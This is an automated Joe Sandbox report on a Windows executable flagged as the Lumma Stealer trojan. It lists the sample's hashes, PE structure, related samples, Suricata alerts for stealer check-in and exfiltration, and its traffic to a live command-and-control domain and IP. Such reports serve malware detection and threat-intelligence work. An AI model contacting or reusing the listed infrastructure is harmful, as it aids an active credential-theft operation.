                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          172.67.165.185
                                                                                          		mindhandru.buzzUnited States
                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                          General Information

                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1580875
                                                                                          Start date and time:2024-12-26 12:44:11 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 8m 17s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:23
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:XM6cn2uNux.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:a3f5c08ac61228829905f46d3e4e9dc5.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                          EGA Information:Failed
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 0
                                                                                          • Number of non-executed functions: 6
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 20.198.118.190, 20.190.177.83, 20.199.58.43, 2.16.158.74, 13.107.246.63, 4.175.87.197, 20.223.35.26, 150.171.27.10, 2.16.158.48, 23.218.208.109
                                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com
                                                                                          • Execution Graph export aborted for target XM6cn2uNux.exe, PID 5448 because there are no executed function
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          06:45:14API Interceptor4834314x Sleep call for process: XM6cn2uNux.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          172.67.165.185rwFNJ4pHWG.exeGet hashmaliciousLummaCBrowse
                                                                                            dEugughckk.exeGet hashmaliciousLummaCBrowse
                                                                                              Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                https://click.jipolismall.de/i86/Get hashmaliciousUnknownBrowse
                                                                                                  https://ser.optimalesi.de/i87/Get hashmaliciousUnknownBrowse
                                                                                                    https://ser.optimalesi.de/i68Get hashmaliciousUnknownBrowse
                                                                                                      https://cpanel.vivatell.de/i105/Get hashmaliciousUnknownBrowse
                                                                                                        https://cpanel.vivatell.de/i105/Get hashmaliciousUnknownBrowse
                                                                                                          https://out.novastellz.de/i45/Get hashmaliciousUnknownBrowse

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            fp2e7a.wpc.phicdn.netbG89JAQXz2.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 192.229.221.95
                                                                                                            q8b3OisMC4.dllGet hashmaliciousUnknownBrowse
                                                                                                            • 192.229.221.95
                                                                                                            eszstwQPwq.ps1Get hashmaliciousLockBit ransomware, MetasploitBrowse
                                                                                                            • 192.229.221.95
                                                                                                            0vM02qWRT9.ps1Get hashmaliciousLockBit ransomware, MetasploitBrowse
                                                                                                            • 192.229.221.95
                                                                                                            30136156071477318040.jsGet hashmaliciousUnknownBrowse
                                                                                                            • 192.229.221.95
                                                                                                            BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 192.229.221.95
                                                                                                            6vNMeuQvlu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                            • 192.229.221.95
                                                                                                            2ZsJ2iP8Q2.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 192.229.221.95
                                                                                                            BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 192.229.221.95
                                                                                                            mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 192.229.221.95
                                                                                                            mindhandru.buzzZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.11.101
                                                                                                            0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                            • 104.21.11.101
                                                                                                            TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.11.101
                                                                                                            COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.11.101
                                                                                                            rwFNJ4pHWG.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            lBsKTx65QC.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.11.101
                                                                                                            dEugughckk.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            CLOUDFLARENETUSZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.11.101
                                                                                                            6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.157.254
                                                                                                            0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                            • 104.21.11.101
                                                                                                            TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.11.101
                                                                                                            COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.11.101
                                                                                                            rwFNJ4pHWG.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            Ebgl8jb6CW.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.157.254
                                                                                                            lBsKTx65QC.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.11.101
                                                                                                            35K4Py4lii.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.66.86
                                                                                                            dEugughckk.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            a0e9f5d64349fb13191bc781f81f42e1ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                            • 172.67.165.185
                                                                                                            TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            COBYmpzi7q.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            rwFNJ4pHWG.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            Ebgl8jb6CW.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            lBsKTx65QC.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            35K4Py4lii.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185
                                                                                                            dEugughckk.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.165.185

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            No created / dropped files found

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):7.9475387224526335
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:XM6cn2uNux.exe
                                                                                                            File size:1'887'232 bytes
                                                                                                            MD5:a3f5c08ac61228829905f46d3e4e9dc5
                                                                                                            SHA1:f412251760048ed7d1f078fa3de654fe8c52262c
                                                                                                            SHA256:2791569a37e501f3c7b0c74aa2a75adaf30a07852c13e0f9d0fc658a948fe8c7
                                                                                                            SHA512:890c20f4f1dce61a8988ac2748ac2c71f4a20c93591e7688888ea86e89308423c5fcaebba42a0603c4dd765b551c84abc00684f7fcf533c25d0c3752bc0d76d2
                                                                                                            SSDEEP:24576:eC5y9GEODNMe7cJkVsnbzGgE0WC5cNsEKdNVhp2N00Rqk322F3JN98B8Mqv24idz:Ty0FRpAhxBW/zuNVn2C0RqkNF3ie/G7
                                                                                                            TLSH:E99533531E0AC2B5E899A0F3D5DE26913238E9D6BDFA0FAC0C01F46AD96F7650DB141C
                                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig.............................PJ...........@...........................J...........@.................................Y@..m..

                                                                                                            File Icon

                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x8a5000
                                                                                                            Entrypoint Section:.taggant
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:6
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:6
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:6
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            jmp 00007FC57CDE541Ah
                                                                                                            rsm
                                                                                                            sbb al, 00h
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            jmp 00007FC57CDE7415h
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], 00000000h
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            push es
                                                                                                            or al, byte ptr [eax]
                                                                                                            add byte ptr [edi], al
                                                                                                            or al, byte ptr [eax]
                                                                                                            add byte ptr [ebx], cl
                                                                                                            or al, byte ptr [eax]
                                                                                                            add byte ptr [ecx], al
                                                                                                            or al, byte ptr [eax]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [edx], al
                                                                                                            or al, byte ptr [eax]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [ecx], al
                                                                                                            add byte ptr [eax], 00000000h
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            adc byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add eax, 0000000Ah
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], dh
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [edx], cl
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x1ac.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            0x10000x520000x2640066914215f7e6253acf7eb9c9ecdc74bbFalse0.9995659722222222data7.9847234008770345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .rsrc0x530000x1ac0x200c4249243ceaeb236e3ce8ce2ab2c9a69False0.5390625data5.249019796122045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            0x550000x2ac0000x20032220582459c7d1f126bdbc19fb3155aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            nfuikskw0x3010000x1a30000x1a2a009f5fd6e8057db73a84bf47221cf1e144False0.9946649186324276data7.953324475907689IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            uavdauvr0x4a40000x10000x60066a6ea80dcd50e9d3becc874ffab4d89False0.5533854166666666data4.908482209746096IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .taggant0x4a50000x30000x22005c535d2bd8af3060e1f0184c0f90eb12False0.06318933823529412DOS executable (COM)0.8181446851419909IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_MANIFEST0x530580x152ASCII text, with CRLF line terminators0.6479289940828402

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            kernel32.dlllstrcpy

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-12-26T12:45:12.336203+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649714172.67.165.185443TCP
                                                                                                            2024-12-26T12:45:15.142184+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649714172.67.165.185443TCP
                                                                                                            2024-12-26T12:45:15.142184+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649714172.67.165.185443TCP
                                                                                                            2024-12-26T12:45:16.458009+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649720172.67.165.185443TCP
                                                                                                            2024-12-26T12:45:17.258145+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649720172.67.165.185443TCP
                                                                                                            2024-12-26T12:45:17.258145+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649720172.67.165.185443TCP
                                                                                                            2024-12-26T12:45:19.228606+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649736172.67.165.185443TCP
                                                                                                            2024-12-26T12:45:27.250374+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649736172.67.165.185443TCP
                                                                                                            2024-12-26T12:45:28.698182+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649760172.67.165.185443TCP
                                                                                                            2024-12-26T12:46:10.836888+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649760172.67.165.185443TCP
                                                                                                            2024-12-26T12:46:12.433761+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649860172.67.165.185443TCP
                                                                                                            2024-12-26T12:47:22.368235+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649860172.67.165.185443TCP
                                                                                                            2024-12-26T12:47:24.388227+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650006172.67.165.185443TCP
                                                                                                            2024-12-26T12:47:26.599901+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650007172.67.165.185443TCP
                                                                                                            2024-12-26T12:47:28.145167+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650008172.67.165.185443TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 26, 2024 12:45:11.023111105 CET49714443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:11.023169994 CET44349714172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:11.023241043 CET49714443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:11.026899099 CET49714443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:11.026921034 CET44349714172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:12.336070061 CET44349714172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:12.336203098 CET49714443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:12.340415955 CET49714443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:12.340437889 CET44349714172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:12.340841055 CET44349714172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:12.383028984 CET49714443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:12.392869949 CET49714443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:12.392889977 CET49714443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:12.393043041 CET44349714172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:15.142184973 CET44349714172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:15.142292023 CET44349714172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:15.142353058 CET49714443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:15.144221067 CET49714443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:15.144257069 CET44349714172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:15.154062033 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:15.154118061 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:15.154285908 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:15.154603004 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:15.154623032 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:16.457931995 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:16.458009005 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:16.459568977 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:16.459580898 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:16.459813118 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:16.461064100 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:16.461081028 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:16.461127996 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.258157969 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.258219957 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.258253098 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.258294106 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.258347034 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.258368969 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.258380890 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.258421898 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.258455038 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.265408993 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.268852949 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.268872023 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.272591114 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.272646904 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.272656918 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.324848890 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.377909899 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.377994061 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.380264997 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.380285025 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.430185080 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.468435049 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.472248077 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.472311020 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.472419024 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.472492933 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.594048023 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.594096899 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.920731068 CET49736443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.920753002 CET44349736172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.920936108 CET49736443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.921264887 CET49736443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.921278000 CET44349736172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:19.228142977 CET44349736172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:19.228605986 CET49736443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:19.229696989 CET49736443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:19.229705095 CET44349736172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:19.230192900 CET44349736172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:19.232146978 CET49736443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:19.232323885 CET49736443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:19.232346058 CET44349736172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:27.250349998 CET44349736172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:27.250463009 CET44349736172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:27.250534058 CET49736443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:27.250834942 CET49736443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:27.250849009 CET44349736172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:27.393951893 CET49760443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:27.394006968 CET44349760172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:27.394076109 CET49760443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:27.394404888 CET49760443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:27.394419909 CET44349760172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:28.698107004 CET44349760172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:28.698182106 CET49760443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:28.700061083 CET49760443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:28.700077057 CET44349760172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:28.700315952 CET44349760172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:28.701997042 CET49760443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:28.702140093 CET49760443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:28.702172041 CET44349760172.67.165.185192.168.2.6
